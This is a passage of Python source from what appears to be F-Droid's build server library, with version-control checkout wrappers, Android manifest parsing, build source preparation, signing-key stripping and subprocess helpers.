cwd=self.local, output=False)\n result = p.output.rstrip()\n if not result.endswith(self.local):\n raise VCSException('Repository mismatch')\n\n def gotorevisionx(self, rev):\n if not os.path.exists(self.local):\n # Brand new checkout\n gitsvn_args = ['git', 'svn', 'clone']\n if ';' in self.remote:\n remote_split = self.remote.split(';')\n for i in remote_split[1:]:\n if i.startswith('trunk='):\n gitsvn_args.extend(['-T', i[6:]])\n elif i.startswith('tags='):\n gitsvn_args.extend(['-t', i[5:]])\n elif i.startswith('branches='):\n gitsvn_args.extend(['-b', i[9:]])\n gitsvn_args.extend([remote_split[0], self.local])\n p = FDroidPopen(gitsvn_args, output=False)\n if p.returncode != 0:\n self.clone_failed = True\n raise VCSException(\"Git svn clone failed\", p.output)\n else:\n gitsvn_args.extend([self.remote, self.local])\n p = FDroidPopen(gitsvn_args, output=False)\n if p.returncode != 0:\n self.clone_failed = True\n raise VCSException(\"Git svn clone failed\", p.output)\n self.checkrepo()\n else:\n self.checkrepo()\n # Discard any working tree changes\n p = FDroidPopen(['git', 'reset', '--hard'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git reset failed\", p.output)\n # Remove untracked files now, in case they're tracked in the target\n # revision (it happens!)\n p = FDroidPopen(['git', 'clean', '-dffx'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git clean failed\", p.output)\n if not self.refreshed:\n # Get new commits, branches and tags from repo\n p = FDroidPopen(['git', 'svn', 'fetch'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git svn fetch failed\")\n p = FDroidPopen(['git', 'svn', 'rebase'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git svn rebase failed\", p.output)\n self.refreshed = True\n\n rev = rev or 'master'\n if rev:\n nospaces_rev = rev.replace(' ', '%20')\n # Try finding a svn tag\n for treeish in ['origin/', '']:\n p = FDroidPopen(['git', 'checkout', treeish + 'tags/' + nospaces_rev], cwd=self.local, output=False)\n if p.returncode == 0:\n break\n if p.returncode != 0:\n # No tag found, normal svn rev translation\n # Translate svn rev into git format\n rev_split = rev.split('/')\n\n p = None\n for treeish in ['origin/', '']:\n if len(rev_split) > 1:\n treeish += rev_split[0]\n svn_rev = rev_split[1]\n\n else:\n # if no branch is specified, then assume trunk (i.e. 'master' branch):\n treeish += 'master'\n svn_rev = rev\n\n svn_rev = svn_rev if svn_rev[0] == 'r' else 'r' + svn_rev\n\n p = FDroidPopen(['git', 'svn', 'find-rev', '--before', svn_rev, treeish], cwd=self.local, output=False)\n git_rev = p.output.rstrip()\n\n if p.returncode == 0 and git_rev:\n break\n\n if p.returncode != 0 or not git_rev:\n # Try a plain git checkout as a last resort\n p = FDroidPopen(['git', 'checkout', rev], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"No git treeish found and direct git checkout of '%s' failed\" % rev, p.output)\n else:\n # Check out the git rev equivalent to the svn rev\n p = FDroidPopen(['git', 'checkout', git_rev], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git checkout of '%s' failed\" % rev, p.output)\n\n # Get rid of any uncontrolled files left behind\n p = FDroidPopen(['git', 'clean', '-dffx'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git clean failed\", p.output)\n\n def _gettags(self):\n self.checkrepo()\n for treeish in ['origin/', '']:\n d = os.path.join(self.local, '.git', 'svn', 'refs', 'remotes', treeish, 'tags')\n if os.path.isdir(d):\n return os.listdir(d)\n\n def getref(self):\n self.checkrepo()\n p = FDroidPopen(['git', 'svn', 'find-rev', 'HEAD'], cwd=self.local, output=False)\n if p.returncode != 0:\n return None\n return p.output.strip()\n\n\nclass vcs_hg(vcs):\n\n def repotype(self):\n return 'hg'\n\n def gotorevisionx(self, rev):\n if not os.path.exists(self.local):\n p = FDroidPopen(['hg', 'clone', self.remote, self.local], output=False)\n if p.returncode != 0:\n self.clone_failed = True\n raise VCSException(\"Hg clone failed\", p.output)\n else:\n p = FDroidPopen(['hg', 'status', '-uS'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Hg status failed\", p.output)\n for line in p.output.splitlines():\n if not line.startswith('? '):\n raise VCSException(\"Unexpected output from hg status -uS: \" + line)\n FDroidPopen(['rm', '-rf', line[2:]], cwd=self.local, output=False)\n if not self.refreshed:\n p = FDroidPopen(['hg', 'pull'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Hg pull failed\", p.output)\n self.refreshed = True\n\n rev = rev or 'default'\n if not rev:\n return\n p = FDroidPopen(['hg', 'update', '-C', rev], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Hg checkout of '%s' failed\" % rev, p.output)\n p = FDroidPopen(['hg', 'purge', '--all'], cwd=self.local, output=False)\n # Also delete untracked files, we have to enable purge extension for that:\n if \"'purge' is provided by the following extension\" in p.output:\n with open(os.path.join(self.local, '.hg', 'hgrc'), \"a\") as myfile:\n myfile.write(\"\\n[extensions]\\nhgext.purge=\\n\")\n p = FDroidPopen(['hg', 'purge', '--all'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"HG purge failed\", p.output)\n elif p.returncode != 0:\n raise VCSException(\"HG purge failed\", p.output)\n\n def _gettags(self):\n p = FDroidPopen(['hg', 'tags', '-q'], cwd=self.local, output=False)\n return p.output.splitlines()[1:]\n\n\nclass vcs_bzr(vcs):\n\n def repotype(self):\n return 'bzr'\n\n def gotorevisionx(self, rev):\n if not os.path.exists(self.local):\n p = FDroidPopen(['bzr', 'branch', self.remote, self.local], output=False)\n if p.returncode != 0:\n self.clone_failed = True\n raise VCSException(\"Bzr branch failed\", p.output)\n else:\n p = FDroidPopen(['bzr', 'clean-tree', '--force', '--unknown', '--ignored'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Bzr revert failed\", p.output)\n if not self.refreshed:\n p = FDroidPopen(['bzr', 'pull'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Bzr update failed\", p.output)\n self.refreshed = True\n\n revargs = list(['-r', rev] if rev else [])\n p = FDroidPopen(['bzr', 'revert'] + revargs, cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Bzr revert of '%s' failed\" % rev, p.output)\n\n def _gettags(self):\n p = FDroidPopen(['bzr', 'tags'], cwd=self.local, output=False)\n return [tag.split(' ')[0].strip() for tag in\n p.output.splitlines()]\n\n\ndef unescape_string(string):\n if len(string) < 2:\n return string\n if string[0] == '\"' and string[-1] == '\"':\n return string[1:-1]\n\n return string.replace(\"\\\\'\", \"'\")\n\n\ndef retrieve_string(app_dir, string, xmlfiles=None):\n\n if not string.startswith('@string/'):\n return unescape_string(string)\n\n if xmlfiles is None:\n xmlfiles = []\n for res_dir in [\n os.path.join(app_dir, 'res'),\n os.path.join(app_dir, 'src', 'main', 'res'),\n ]:\n for r, d, f in os.walk(res_dir):\n if os.path.basename(r) == 'values':\n xmlfiles += [os.path.join(r, x) for x in f if x.endswith('.xml')]\n\n name = string[len('@string/'):]\n\n def element_content(element):\n if element.text is None:\n return \"\"\n s = XMLElementTree.tostring(element, encoding='utf-8', method='text')\n return s.decode('utf-8').strip()\n\n for path in xmlfiles:\n if not os.path.isfile(path):\n continue\n xml = parse_xml(path)\n element = xml.find('string[@name=\"' + name + '\"]')\n if element is not None:\n content = element_content(element)\n return retrieve_string(app_dir, content, xmlfiles)\n\n return ''\n\n\ndef retrieve_string_singleline(app_dir, string, xmlfiles=None):\n return retrieve_string(app_dir, string, xmlfiles).replace('\\n', ' ').strip()\n\n\n# Return list of existing files that will be used to find the highest vercode\ndef manifest_paths(app_dir, flavours):\n\n possible_manifests = \\\n [os.path.join(app_dir, 'AndroidManifest.xml'),\n os.path.join(app_dir, 'src', 'main', 'AndroidManifest.xml'),\n os.path.join(app_dir, 'src', 'AndroidManifest.xml'),\n os.path.join(app_dir, 'build.gradle')]\n\n for flavour in flavours:\n if flavour == 'yes':\n continue\n possible_manifests.append(\n os.path.join(app_dir, 'src', flavour, 'AndroidManifest.xml'))\n\n return [path for path in possible_manifests if os.path.isfile(path)]\n\n\n# Retrieve the package name. Returns the name, or None if not found.\ndef fetch_real_name(app_dir, flavours):\n for path in manifest_paths(app_dir, flavours):\n if not has_extension(path, 'xml') or not os.path.isfile(path):\n continue\n logging.debug(\"fetch_real_name: Checking manifest at \" + path)\n xml = parse_xml(path)\n app = xml.find('application')\n if app is None:\n continue\n if \"{http://schemas.android.com/apk/res/android}label\" not in app.attrib:\n continue\n label = app.attrib[\"{http://schemas.android.com/apk/res/android}label\"]\n result = retrieve_string_singleline(app_dir, label)\n if result:\n result = result.strip()\n return result\n return None\n\n\ndef get_library_references(root_dir):\n libraries = []\n proppath = os.path.join(root_dir, 'project.properties')\n if not os.path.isfile(proppath):\n return libraries\n with open(proppath, 'r', encoding='iso-8859-1') as f:\n for line in f:\n if not line.startswith('android.library.reference.'):\n continue\n path = line.split('=')[1].strip()\n relpath = os.path.join(root_dir, path)\n if not os.path.isdir(relpath):\n continue\n logging.debug(\"Found subproject at %s\" % path)\n libraries.append(path)\n return libraries\n\n\ndef ant_subprojects(root_dir):\n subprojects = get_library_references(root_dir)\n for subpath in subprojects:\n subrelpath = os.path.join(root_dir, subpath)\n for p in get_library_references(subrelpath):\n relp = os.path.normpath(os.path.join(subpath, p))\n if relp not in subprojects:\n subprojects.insert(0, relp)\n return subprojects\n\n\ndef remove_debuggable_flags(root_dir):\n # Remove forced debuggable flags\n logging.debug(\"Removing debuggable flags from %s\" % root_dir)\n for root, dirs, files in os.walk(root_dir):\n if 'AndroidManifest.xml' in files:\n regsub_file(r'android:debuggable=\"[^\"]*\"',\n '',\n os.path.join(root, 'AndroidManifest.xml'))\n\n\nvcsearch_g = re.compile(r'.*versionCode *=* *[\"\\']*([0-9]+)[\"\\']*').search\nvnsearch_g = re.compile(r'.*versionName *=* *([\"\\'])((?:(?=(\\\\?))\\3.)*?)\\1.*').search\npsearch_g = re.compile(r'.*(packageName|applicationId) *=* *[\"\\']([^\"]+)[\"\\'].*').search\n\n\ndef app_matches_packagename(app, package):\n if not package:\n return False\n appid = app.UpdateCheckName or app.id\n if appid is None or appid == \"Ignore\":\n return True\n return appid == package\n\n\n# Extract some information from the AndroidManifest.xml at the given path.\n# Returns (version, vercode, package), any or all of which might be None.\n# All values returned are strings.\ndef parse_androidmanifests(paths, app):\n\n ignoreversions = app.UpdateCheckIgnore\n ignoresearch = re.compile(ignoreversions).search if ignoreversions else None\n\n if not paths:\n return (None, None, None)\n\n max_version = None\n max_vercode = None\n max_package = None\n\n for path in paths:\n\n if not os.path.isfile(path):\n continue\n\n logging.debug(\"Parsing manifest at {0}\".format(path))\n gradle = has_extension(path, 'gradle')\n version = None\n vercode = None\n package = None\n\n if gradle:\n with open(path, 'r') as f:\n for line in f:\n if gradle_comment.match(line):\n continue\n # Grab first occurence of each to avoid running into\n # alternative flavours and builds.\n if not package:\n matches = psearch_g(line)\n if matches:\n s = matches.group(2)\n if app_matches_packagename(app, s):\n package = s\n if not version:\n matches = vnsearch_g(line)\n if matches:\n version = matches.group(2)\n if not vercode:\n matches = vcsearch_g(line)\n if matches:\n vercode = matches.group(1)\n else:\n try:\n xml = parse_xml(path)\n if \"package\" in xml.attrib:\n s = xml.attrib[\"package\"]\n if app_matches_packagename(app, s):\n package = s\n if \"{http://schemas.android.com/apk/res/android}versionName\" in xml.attrib:\n version = xml.attrib[\"{http://schemas.android.com/apk/res/android}versionName\"]\n base_dir = os.path.dirname(path)\n version = retrieve_string_singleline(base_dir, version)\n if \"{http://schemas.android.com/apk/res/android}versionCode\" in xml.attrib:\n a = xml.attrib[\"{http://schemas.android.com/apk/res/android}versionCode\"]\n if string_is_integer(a):\n vercode = a\n except Exception:\n logging.warning(\"Problem with xml at {0}\".format(path))\n\n # Remember package name, may be defined separately from version+vercode\n if package is None:\n package = max_package\n\n logging.debug(\"..got package={0}, version={1}, vercode={2}\"\n .format(package, version, vercode))\n\n # Always grab the package name and version name in case they are not\n # together with the highest version code\n if max_package is None and package is not None:\n max_package = package\n if max_version is None and version is not None:\n max_version = version\n\n if max_vercode is None or (vercode is not None and vercode > max_vercode):\n if not ignoresearch or not ignoresearch(version):\n if version is not None:\n max_version = version\n if vercode is not None:\n max_vercode = vercode\n if package is not None:\n max_package = package\n else:\n max_version = \"Ignore\"\n\n if max_version is None:\n max_version = \"Unknown\"\n\n if max_package and not is_valid_package_name(max_package):\n raise FDroidException(\"Invalid package name {0}\".format(max_package))\n\n return (max_version, max_vercode, max_package)\n\n\ndef is_valid_package_name(name):\n return re.match(\"[A-Za-z_][A-Za-z_0-9.]+$\", name)\n\n\nclass FDroidException(Exception):\n\n def __init__(self, value, detail=None):\n self.value = value\n self.detail = detail\n\n def shortened_detail(self):\n if len(self.detail) < 16000:\n return self.detail\n return '[...]\\n' + self.detail[-16000:]\n\n def get_wikitext(self):\n ret = repr(self.value) + \"\\n\"\n if self.detail:\n ret += \"=detail=\\n\"\n ret += \"<pre>\\n\" + self.shortened_detail() + \"</pre>\\n\"\n return ret\n\n def __str__(self):\n ret = self.value\n if self.detail:\n ret += \"\\n==== detail begin ====\\n%s\\n==== detail end ====\" % self.detail.strip()\n return ret\n\n\nclass VCSException(FDroidException):\n pass\n\n\nclass BuildException(FDroidException):\n pass\n\n\n# Get the specified source library.\n# Returns the path to it. Normally this is the path to be used when referencing\n# it, which may be a subdirectory of the actual project. If you want the base\n# directory of the project, pass 'basepath=True'.\ndef getsrclib(spec, srclib_dir, subdir=None, basepath=False,\n raw=False, prepare=True, preponly=False, refresh=True,\n build=None):\n\n number = None\n subdir = None\n if raw:\n name = spec\n ref = None\n else:\n name, ref = spec.split('@')\n if ':' in name:\n number, name = name.split(':', 1)\n if '/' in name:\n name, subdir = name.split('/', 1)\n\n if name not in fdroidserver.metadata.srclibs:\n raise VCSException('srclib ' + name + ' not found.')\n\n srclib = fdroidserver.metadata.srclibs[name]\n\n sdir = os.path.join(srclib_dir, name)\n\n if not preponly:\n vcs = getvcs(srclib[\"Repo Type\"], srclib[\"Repo\"], sdir)\n vcs.srclib = (name, number, sdir)\n if ref:\n vcs.gotorevision(ref, refresh)\n\n if raw:\n return vcs\n\n libdir = None\n if subdir:\n libdir = os.path.join(sdir, subdir)\n elif srclib[\"Subdir\"]:\n for subdir in srclib[\"Subdir\"]:\n libdir_candidate = os.path.join(sdir, subdir)\n if os.path.exists(libdir_candidate):\n libdir = libdir_candidate\n break\n\n if libdir is None:\n libdir = sdir\n\n remove_signing_keys(sdir)\n remove_debuggable_flags(sdir)\n\n if prepare:\n\n if srclib[\"Prepare\"]:\n cmd = replace_config_vars(srclib[\"Prepare\"], build)\n\n p = FDroidPopen(['bash', '-x', '-c', cmd], cwd=libdir)\n if p.returncode != 0:\n raise BuildException(\"Error running prepare command for srclib %s\"\n % name, p.output)\n\n if basepath:\n libdir = sdir\n\n return (name, number, libdir)\n\ngradle_version_regex = re.compile(r\"[^/]*'com\\.android\\.tools\\.build:gradle:([^\\.]+\\.[^\\.]+).*'.*\")\n\n\n# Prepare the source code for a particular build\n# 'vcs' - the appropriate vcs object for the application\n# 'app' - the application details from the metadata\n# 'build' - the build details from the metadata\n# 'build_dir' - the path to the build directory, usually\n# 'build/app.id'\n# 'srclib_dir' - the path to the source libraries directory, usually\n# 'build/srclib'\n# 'extlib_dir' - the path to the external libraries directory, usually\n# 'build/extlib'\n# Returns the (root, srclibpaths) where:\n# 'root' is the root directory, which may be the same as 'build_dir' or may\n# be a subdirectory of it.\n# 'srclibpaths' is information on the srclibs being used\ndef prepare_source(vcs, app, build, build_dir, srclib_dir, extlib_dir, onserver=False, refresh=True):\n\n # Optionally, the actual app source can be in a subdirectory\n if build.subdir:\n root_dir = os.path.join(build_dir, build.subdir)\n else:\n root_dir = build_dir\n\n # Get a working copy of the right revision\n logging.info(\"Getting source for revision \" + build.commit)\n vcs.gotorevision(build.commit, refresh)\n\n # Initialise submodules if required\n if build.submodules:\n logging.info(\"Initialising submodules\")\n vcs.initsubmodules()\n\n # Check that a subdir (if we're using one) exists. This has to happen\n # after the checkout, since it might not exist elsewhere\n if not os.path.exists(root_dir):\n raise BuildException('Missing subdir ' + root_dir)\n\n # Run an init command if one is required\n if build.init:\n cmd = replace_config_vars(build.init, build)\n logging.info(\"Running 'init' commands in %s\" % root_dir)\n\n p = FDroidPopen(['bash', '-x', '-c', cmd], cwd=root_dir)\n if p.returncode != 0:\n raise BuildException(\"Error running init command for %s:%s\" %\n (app.id, build.version), p.output)\n\n # Apply patches if any\n if build.patch:\n logging.info(\"Applying patches\")\n for patch in build.patch:\n patch = patch.strip()\n logging.info(\"Applying \" + patch)\n patch_path = os.path.join('metadata', app.id, patch)\n p = FDroidPopen(['patch', '-p1', '-i', os.path.abspath(patch_path)], cwd=build_dir)\n if p.returncode != 0:\n raise BuildException(\"Failed to apply patch %s\" % patch_path)\n\n # Get required source libraries\n srclibpaths = []\n if build.srclibs:\n logging.info(\"Collecting source libraries\")\n for lib in build.srclibs:\n srclibpaths.append(getsrclib(lib, srclib_dir, build, preponly=onserver,\n refresh=refresh, build=build))\n\n for name, number, libpath in srclibpaths:\n place_srclib(root_dir, int(number) if number else None, libpath)\n\n basesrclib = vcs.getsrclib()\n # If one was used for the main source, add that too.\n if basesrclib:\n srclibpaths.append(basesrclib)\n\n # Update the local.properties file\n localprops = [os.path.join(build_dir, 'local.properties')]\n if build.subdir:\n parts = build.subdir.split(os.sep)\n cur = build_dir\n for d in parts:\n cur = os.path.join(cur, d)\n localprops += [os.path.join(cur, 'local.properties')]\n for path in localprops:\n props = \"\"\n if os.path.isfile(path):\n logging.info(\"Updating local.properties file at %s\" % path)\n with open(path, 'r', encoding='iso-8859-1') as f:\n props += f.read()\n props += '\\n'\n else:\n logging.info(\"Creating local.properties file at %s\" % path)\n # Fix old-fashioned 'sdk-location' by copying\n # from sdk.dir, if necessary\n if build.oldsdkloc:\n sdkloc = re.match(r\".*^sdk.dir=(\\S+)$.*\", props,\n re.S | re.M).group(1)\n props += \"sdk-location=%s\\n\" % sdkloc\n else:\n props += \"sdk.dir=%s\\n\" % config['sdk_path']\n props += \"sdk-location=%s\\n\" % config['sdk_path']\n ndk_path = build.ndk_path()\n # if for any reason the path isn't valid or the directory\n # doesn't exist, some versions of Gradle will error with a\n # cryptic message (even if the NDK is not even necessary).\n # https://gitlab.com/fdroid/fdroidserver/issues/171\n if ndk_path and os.path.exists(ndk_path):\n # Add ndk location\n props += \"ndk.dir=%s\\n\" % ndk_path\n props += \"ndk-location=%s\\n\" % ndk_path\n # Add java.encoding if necessary\n if build.encoding:\n props += \"java.encoding=%s\\n\" % build.encoding\n with open(path, 'w', encoding='iso-8859-1') as f:\n f.write(props)\n\n flavours = []\n if build.build_method() == 'gradle':\n flavours = build.gradle\n\n if build.target:\n n = build.target.split('-')[1]\n regsub_file(r'compileSdkVersion[ =]+[0-9]+',\n r'compileSdkVersion %s' % n,\n os.path.join(root_dir, 'build.gradle'))\n\n # Remove forced debuggable flags\n remove_debuggable_flags(root_dir)\n\n # Insert version code and number into the manifest if necessary\n if build.forceversion:\n logging.info(\"Changing the version name\")\n for path in manifest_paths(root_dir, flavours):\n if not os.path.isfile(path):\n continue\n if has_extension(path, 'xml'):\n regsub_file(r'android:versionName=\"[^\"]*\"',\n r'android:versionName=\"%s\"' % build.version,\n path)\n elif has_extension(path, 'gradle'):\n regsub_file(r\"\"\"(\\s*)versionName[\\s'\"=]+.*\"\"\",\n r\"\"\"\\1versionName '%s'\"\"\" % build.version,\n path)\n\n if build.forcevercode:\n logging.info(\"Changing the version code\")\n for path in manifest_paths(root_dir, flavours):\n if not os.path.isfile(path):\n continue\n if has_extension(path, 'xml'):\n regsub_file(r'android:versionCode=\"[^\"]*\"',\n r'android:versionCode=\"%s\"' % build.vercode,\n path)\n elif has_extension(path, 'gradle'):\n regsub_file(r'versionCode[ =]+[0-9]+',\n r'versionCode %s' % build.vercode,\n path)\n\n # Delete unwanted files\n if build.rm:\n logging.info(\"Removing specified files\")\n for part in getpaths(build_dir, build.rm):\n dest = os.path.join(build_dir, part)\n logging.info(\"Removing {0}\".format(part))\n if os.path.lexists(dest):\n if os.path.islink(dest):\n FDroidPopen(['unlink', dest], output=False)\n else:\n FDroidPopen(['rm', '-rf', dest], output=False)\n else:\n logging.info(\"...but it didn't exist\")\n\n remove_signing_keys(build_dir)\n\n # Add required external libraries\n if build.extlibs:\n logging.info(\"Collecting prebuilt libraries\")\n libsdir = os.path.join(root_dir, 'libs')\n if not os.path.exists(libsdir):\n os.mkdir(libsdir)\n for lib in build.extlibs:\n lib = lib.strip()\n logging.info(\"...installing extlib {0}\".format(lib))\n libf = os.path.basename(lib)\n libsrc = os.path.join(extlib_dir, lib)\n if not os.path.exists(libsrc):\n raise BuildException(\"Missing extlib file {0}\".format(libsrc))\n shutil.copyfile(libsrc, os.path.join(libsdir, libf))\n\n # Run a pre-build command if one is required\n if build.prebuild:\n logging.info(\"Running 'prebuild' commands in %s\" % root_dir)\n\n cmd = replace_config_vars(build.prebuild, build)\n\n # Substitute source library paths into prebuild commands\n for name, number, libpath in srclibpaths:\n libpath = os.path.relpath(libpath, root_dir)\n cmd = cmd.replace('$$' + name + '$$', libpath)\n\n p = FDroidPopen(['bash', '-x', '-c', cmd], cwd=root_dir)\n if p.returncode != 0:\n raise BuildException(\"Error running prebuild command for %s:%s\" %\n (app.id, build.version), p.output)\n\n # Generate (or update) the ant build file, build.xml...\n if build.build_method() == 'ant' and build.update != ['no']:\n parms = ['android', 'update', 'lib-project']\n lparms = ['android', 'update', 'project']\n\n if build.target:\n parms += ['-t', build.target]\n lparms += ['-t', build.target]\n if build.update:\n update_dirs = build.update\n else:\n update_dirs = ant_subprojects(root_dir) + ['.']\n\n for d in update_dirs:\n subdir = os.path.join(root_dir, d)\n if d == '.':\n logging.debug(\"Updating main project\")\n cmd = parms + ['-p', d]\n else:\n logging.debug(\"Updating subproject %s\" % d)\n cmd = lparms + ['-p', d]\n p = SdkToolsPopen(cmd, cwd=root_dir)\n # Check to see whether an error was returned without a proper exit\n # code (this is the case for the 'no target set or target invalid'\n # error)\n if p.returncode != 0 or p.output.startswith(\"Error: \"):\n raise BuildException(\"Failed to update project at %s\" % d, p.output)\n # Clean update dirs via ant\n if d != '.':\n logging.info(\"Cleaning subproject %s\" % d)\n p = FDroidPopen(['ant', 'clean'], cwd=subdir)\n\n return (root_dir, srclibpaths)\n\n\n# Extend via globbing the paths from a field and return them as a map from\n# original path to resulting paths\ndef getpaths_map(build_dir, globpaths):\n paths = dict()\n for p in globpaths:\n p = p.strip()\n full_path = os.path.join(build_dir, p)\n full_path = os.path.normpath(full_path)\n paths[p] = [r[len(build_dir) + 1:] for r in glob.glob(full_path)]\n if not paths[p]:\n raise FDroidException(\"glob path '%s' did not match any files/dirs\" % p)\n return paths\n\n\n# Extend via globbing the paths from a field and return them as a set\ndef getpaths(build_dir, globpaths):\n paths_map = getpaths_map(build_dir, globpaths)\n paths = set()\n for k, v in paths_map.items():\n for p in v:\n paths.add(p)\n return paths\n\n\ndef natural_key(s):\n return [int(sp) if sp.isdigit() else sp for sp in re.split(r'(\\d+)', s)]\n\n\nclass KnownApks:\n\n def __init__(self):\n self.path = os.path.join('stats', 'known_apks.txt')\n self.apks = {}\n if os.path.isfile(self.path):\n with open(self.path, 'r', encoding='utf8') as f:\n for line in f:\n t = line.rstrip().split(' ')\n if len(t) == 2:\n self.apks[t[0]] = (t[1], None)\n else:\n self.apks[t[0]] = (t[1], time.strptime(t[2], '%Y-%m-%d'))\n self.changed = False\n\n def writeifchanged(self):\n if not self.changed:\n return\n\n if not os.path.exists('stats'):\n os.mkdir('stats')\n\n lst = []\n for apk, app in self.apks.items():\n appid, added = app\n line = apk + ' ' + appid\n if added:\n line += ' ' + time.strftime('%Y-%m-%d', added)\n lst.append(line)\n\n with open(self.path, 'w', encoding='utf8') as f:\n for line in sorted(lst, key=natural_key):\n f.write(line + '\\n')\n\n # Record an apk (if it's new, otherwise does nothing)\n # Returns the date it was added.\n def recordapk(self, apk, app, default_date=None):\n if apk not in self.apks:\n if default_date is None:\n default_date = time.gmtime(time.time())\n self.apks[apk] = (app, default_date)\n self.changed = True\n _, added = self.apks[apk]\n return added\n\n # Look up information - given the 'apkname', returns (app id, date added/None).\n # Or returns None for an unknown apk.\n def getapp(self, apkname):\n if apkname in self.apks:\n return self.apks[apkname]\n return None\n\n # Get the most recent 'num' apps added to the repo, as a list of package ids\n # with the most recent first.\n def getlatest(self, num):\n apps = {}\n for apk, app in self.apks.items():\n appid, added = app\n if added:\n if appid in apps:\n if apps[appid] > added:\n apps[appid] = added\n else:\n apps[appid] = added\n sortedapps = sorted(apps.items(), key=operator.itemgetter(1))[-num:]\n lst = [app for app, _ in sortedapps]\n lst.reverse()\n return lst\n\n\ndef isApkDebuggable(apkfile, config):\n \"\"\"Returns True if the given apk file is debuggable\n\n :param apkfile: full path to the apk to check\"\"\"\n\n p = SdkToolsPopen(['aapt', 'dump', 'xmltree', apkfile, 'AndroidManifest.xml'],\n output=False)\n if p.returncode != 0:\n logging.critical(\"Failed to get apk manifest information\")\n sys.exit(1)\n for line in p.output.splitlines():\n if 'android:debuggable' in line and not line.endswith('0x0'):\n return True\n return False\n\n\nclass PopenResult:\n def __init__(self):\n self.returncode = None\n self.output = None\n\n\ndef SdkToolsPopen(commands, cwd=None, output=True):\n cmd = commands[0]\n if cmd not in config:\n config[cmd] = find_sdk_tools_cmd(commands[0])\n abscmd = config[cmd]\n if abscmd is None:\n logging.critical(\"Could not find '%s' on your system\" % cmd)\n sys.exit(1)\n return FDroidPopen([abscmd] + commands[1:],\n cwd=cwd, output=output)\n\n\ndef FDroidPopenBytes(commands, cwd=None, output=True, stderr_to_stdout=True):\n \"\"\"\n Run a command and capture the possibly huge output as bytes.\n\n :param commands: command and argument list like in subprocess.Popen\n :param cwd: optionally specifies a working directory\n :returns: A PopenResult.\n \"\"\"\n\n global env\n if env is None:\n set_FDroidPopen_env()\n\n if cwd:\n cwd = os.path.normpath(cwd)\n logging.debug(\"Directory: %s\" % cwd)\n logging.debug(\"> %s\" % ' '.join(commands))\n\n stderr_param = subprocess.STDOUT if stderr_to_stdout else subprocess.PIPE\n result = PopenResult()\n p = None\n try:\n p = subprocess.Popen(commands, cwd=cwd, shell=False, env=env,\n stdout=subprocess.PIPE, stderr=stderr_param)\n except OSError as e:\n raise BuildException(\"OSError while trying to execute \" +\n ' '.join(commands) + ': ' + str(e))\n\n if not stderr_to_stdout and options.verbose:\n stderr_queue = Queue()\n stderr_reader = AsynchronousFileReader(p.stderr, stderr_queue)\n\n while not stderr_reader.eof():\n while not stderr_queue.empty():\n line = stderr_queue.get()\n sys.stderr.buffer.write(line)\n sys.stderr.flush()\n\n time.sleep(0.1)\n\n stdout_queue = Queue()\n stdout_reader = AsynchronousFileReader(p.stdout, stdout_queue)\n buf = io.BytesIO()\n\n # Check the queue for output (until there is no more to get)\n while not stdout_reader.eof():\n while not stdout_queue.empty():\n line = stdout_queue.get()\n if output and options.verbose:\n # Output directly to console\n sys.stderr.buffer.write(line)\n sys.stderr.flush()\n buf.write(line)\n\n time.sleep(0.1)\n\n result.returncode = p.wait()\n result.output = buf.getvalue()\n buf.close()\n return result\n\n\ndef FDroidPopen(commands, cwd=None, output=True, stderr_to_stdout=True):\n \"\"\"\n Run a command and capture the possibly huge output as a str.\n\n :param commands: command and argument list like in subprocess.Popen\n :param cwd: optionally specifies a working directory\n :returns: A PopenResult.\n \"\"\"\n result = FDroidPopenBytes(commands, cwd, output, stderr_to_stdout)\n result.output = result.output.decode('utf-8')\n return result\n\n\ngradle_comment = re.compile(r'[ ]*//')\ngradle_signing_configs = re.compile(r'^[\\t ]*signingConfigs[ \\t]*{[ \\t]*$')\ngradle_line_matches = [\n re.compile(r'^[\\t ]*signingConfig [^ ]*$'),\n re.compile(r'.*android\\.signingConfigs\\.[^{]*$'),\n re.compile(r'.*\\.readLine\\(.*'),\n]\n\n\ndef remove_signing_keys(build_dir):\n for root, dirs, files in os.walk(build_dir):\n if 'build.gradle' in files:\n path = os.path.join(root, 'build.gradle')\n\n with open(path, \"r\", encoding='utf8') as o:\n lines = o.readlines()\n\n changed = False\n\n opened = 0\n i = 0\n with open(path, \"w\", encoding='utf8') as o:\n while i < len(lines):\n line = lines[i]\n i += 1\n while line.endswith('\\\\\\n'):\n line = line.rstrip('\\\\\\n') + lines[i]\n i += 1\n\n if gradle_comment.match(line):\n o.write(line)\n continue\n\n if opened > 0:\n opened += line.count('{')\n opened -= line.count('}')\n continue\n\n if gradle_signing_configs.match(line):\n changed = True\n opened += 1\n continue\n\n if any(s.match(line) for s in gradle_line_matches):\n changed = True\n continue\n\n if opened == 0:\n o.write(line)\n\n if changed:\n logging.info(\"Cleaned build.gradle of keysigning configs at %s\" % path)\n\n for propfile in [\n 'project.properties',\n 'build.properties',\n 'default.properties',\n 'ant.properties', ]:\n if propfile in files:\n path = os.path.join(root, propfile)\n\n with open(path, \"r\", encoding='iso-8859-1') as o:\n lines = o.readlines()\n\n changed = False\n\n with open(path, \"w\", encoding='iso-8859-1') as o:\n for line in lines:\n if any(line.startswith(s) for s in ('key.store', 'key.alias')):\n changed = True\n continue\n\n o.write(line)\n\n if changed:\n logging.info(\"Cleaned %s of keysigning configs at %s\" % (propfile, path))\n\n\ndef set_FDroidPopen_env(build=None):\n '''\n set up the environment variables for the build environment\n\n There is only a weak standard, the variables used by gradle, so also set\n up the most commonly used environment variables for SDK and NDK. Also, if\n there is no locale set, this will set the locale (e.g. LANG) to en_US.UTF-8.\n '''\n global env, 